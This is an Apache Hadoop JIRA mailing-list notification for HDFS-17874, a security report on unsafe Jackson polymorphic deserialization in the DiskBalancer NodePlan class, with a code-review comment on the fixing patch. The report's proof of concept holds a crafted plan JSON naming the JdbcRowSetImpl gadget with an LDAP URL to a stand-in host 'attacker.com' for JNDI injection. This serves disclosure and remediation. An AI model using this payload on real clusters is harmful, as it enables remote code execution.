[ 
https://issues.apache.org/jira/browse/HDFS-17874?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=18055261#comment-18055261
 ] 

ASF GitHub Bot commented on HDFS-17874:
---------------------------------------

pjfanning commented on code in PR #8196:
URL: https://github.com/apache/hadoop/pull/8196#discussion_r2743047136


##########
hadoop-hdfs-project/hadoop-hdfs/src/main/java/org/apache/hadoop/hdfs/server/diskbalancer/planner/NodePlan.java:
##########
@@ -243,22 +244,11 @@ private static boolean stepClassIsAllowed(String 
className) {
     return false;
   }
 
-  private static List<String> getAllowedPackages() {
-    String packages = CONFIGURATION.get(SUPPORTED_PACKAGES_CONFIG_NAME);
-    return parseCsvLine(packages);
-  }
-
-  static List<String> parseCsvLine(final String line) {
-    if (line == null) {
-      return Collections.emptyList();
-    }
-    List<String> values = new LinkedList<>();
-    for (String value : line.split(",")) {
-      String trimmedValue = value.trim();
-      if (!trimmedValue.isBlank()) {
-        values.add(trimmedValue);
-      }
-    }
-    return values;
+  private static Collection<String> getAllowedPackages() {
+    return CONFIGURATION.getStringCollection(SUPPORTED_PACKAGES_CONFIG_NAME)
+        .stream()
+        .map(String::trim)

Review Comment:
   StringUtils.getStringCollection uses the legacy and discouraged 
java.util.StringTokenizer.
   This StringTokenizer does not trim values - it only omits the delimiter so 
stray whitespace after a comma, for instance, will be returned.
   
   ```
     public static void main(String args[]) {
       String text = "a, b";
       java.util.StringTokenizer tokenizer = new 
java.util.StringTokenizer(text, ",");
       while (tokenizer.hasMoreTokens()) {
         System.out.println("<" + tokenizer.nextToken() + ">");
       }
     }
   ```
   





> Unsafe Jackson Polymorphic Deserialization in HDFS DiskBalancer NodePlan
> ------------------------------------------------------------------------
>
>                 Key: HDFS-17874
>                 URL: https://issues.apache.org/jira/browse/HDFS-17874
>             Project: Hadoop HDFS
>          Issue Type: Bug
>          Components: diskbalancer
>    Affects Versions: 3.4.2
>            Reporter: Cyl
>            Priority: Major
>              Labels: pull-request-available
>
> h3. Summary
> The {{NodePlan}} class in Apache Hadoop HDFS DiskBalancer uses 
> {{@JsonTypeInfo(use = JsonTypeInfo.Id.CLASS)}} annotation, which allows 
> user-controlled JSON input to specify arbitrary Java class names for 
> instantiation during deserialization. While current exploitation is partially 
> mitigated by type constraints and Jackson's internal blocklist, this 
> represents a dangerous coding pattern that could lead to Remote Code 
> Execution (RCE) if mitigations are bypassed.
> h3. Details
> The vulnerability exists in {{NodePlan.java}} where the {{volumeSetPlans}} 
> field is annotated with Jackson's polymorphic type handling:
>  
> {{// File: 
> hadoop-hdfs-project/hadoop-hdfs/src/main/java/org/apache/hadoop/hdfs/server/diskbalancer/planner/NodePlan.java@JsonTypeInfo(use
>  = JsonTypeInfo.Id.CLASS,
>     include = JsonTypeInfo.As.PROPERTY, property = "@class")private 
> List<Step> volumeSetPlans;}}
> When a user executes the DiskBalancer command with a plan file:
>  
> {{hdfs diskbalancer -execute <plan_file.json>}}
> The JSON file is parsed via {{{}NodePlan.parseJson(){}}}:
>  
> {{public static NodePlan parseJson(String json) throws IOException {    
> return READER.readValue(json);  // Deserializes with @JsonTypeInfo}}}
> Jackson reads the {{@class}} property from the JSON and attempts to 
> instantiate the specified class. An attacker can craft a malicious JSON file 
> specifying a gadget class (e.g., {{{}JdbcRowSetImpl{}}}) to trigger JNDI 
> injection or other exploitation chains.
> *Attack Chain:*
>  
> {{User submits malicious plan JSON
>     → hdfs diskbalancer -execute <malicious_plan.json>
>     → ExecuteCommand.submitPlan()
>     → NodePlan.parseJson(planData)
>     → Jackson ObjectMapper.readValue() with @JsonTypeInfo
>     → Attempts arbitrary class instantiation via "@class" property}}
> h3. PoC
>  # {*}Setup Environment{*}: Deploy a Hadoop cluster with DiskBalancer enabled.
>  # {*}Create Malicious Payload{*}: Save the following as 
> {{{}malicious_plan.json{}}}:
>  
> {{{"volumeSetPlans": [{"@class": 
> "com.sun.rowset.JdbcRowSetImpl","dataSourceName": 
> "ldap://attacker.com:1389/Exploit","autoCommit": true}],"nodeName": 
> "victim-datanode","nodeUUID": "00000000-0000-0000-0000-000000000000","port": 
> 9867,"timeStamp": 1234567890000}}}
>  # {*}Execute Attack{*}:
>  
> {{# On a machine with HDFS client accesshdfs diskbalancer -execute 
> malicious_plan.json}}
>  # {*}Observed Behavior{*}:
>  ** With current mitigations: {{InvalidTypeIdException: Not a subtype of 
> Step}}
>  ** Without mitigations (older Jackson/custom Step gadget): JNDI connection 
> to attacker server
>  # {*}Alternative Test (Direct API){*}:
> h3. Impact
>  * {*}Potential RCE{*}: If a gadget class implementing the {{Step}} interface 
> exists in the classpath (via third-party plugins or future code changes), 
> full Remote Code Execution is achievable.
>  * {*}Defense-in-Depth Violation{*}: The code relies entirely on external 
> mitigations (Jackson blocklist, type constraints) rather than implementing 
> proper input validation.
>  * {*}Future Risk{*}: New gadget classes are regularly discovered. The 
> blocklist may not cover all future threats.
> h3. Affected products
>  * {*}Ecosystem{*}: Maven
>  * {*}Package name{*}: org.apache.hadoop:hadoop-hdfs
>  * {*}Affected versions{*}: All versions using {{@JsonTypeInfo(use = 
> JsonTypeInfo.Id.CLASS)}} in NodePlan.java (Confirmed in 3.x branch)
>  * {*}Patched versions{*}:
> h3. Severity
>  * {*}Severity{*}: Medium (currently mitigated) / High (if mitigations 
> bypassed)
>  * {*}Vector string{*}: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H (6.7)
>  ** Attack Vector: Local (requires access to submit DiskBalancer plans)
>  ** Attack Complexity: High (requires bypass of type constraints)
>  ** Privileges Required: Low (authenticated HDFS user)
> h3. Weaknesses
>  * {*}CWE{*}: CWE-502: Deserialization of Untrusted Data
> h3. Occurrences
> ||Permalink||Description||
> |[https://github.com/apache/hadoop/blob/trunk/hadoop-hdfs-project/hadoop-hdfs/src/main/java/org/apache/hadoop/hdfs/server/diskbalancer/planner/NodePlan.java#L34-L36]|The
>  {{@JsonTypeInfo(use=Id.CLASS)}} annotation on {{volumeSetPlans}} field 
> allows user-controlled class instantiation.|
> |[https://github.com/apache/hadoop/blob/trunk/hadoop-hdfs-project/hadoop-hdfs/src/main/java/org/apache/hadoop/hdfs/server/diskbalancer/planner/NodePlan.java#L160-L162]|The
>  {{parseJson()}} method that deserializes user-provided JSON without 
> additional validation.|
> h3. Recommended Fix
> Replace the dangerous {{@JsonTypeInfo(use = JsonTypeInfo.Id.CLASS)}} pattern 
> with a safe alternative by *Use Concrete Type*
> {{// Remove polymorphic deserialization entirelyprivate List<MoveStep> 
> volumeSetPlans;  // Concrete type instead of interface}}
> {{}}



--
This message was sent by Atlassian Jira
(v8.20.10#820010)

---------------------------------------------------------------------
To unsubscribe, e-mail: [email protected]
For additional commands, e-mail: [email protected]

Reply via email to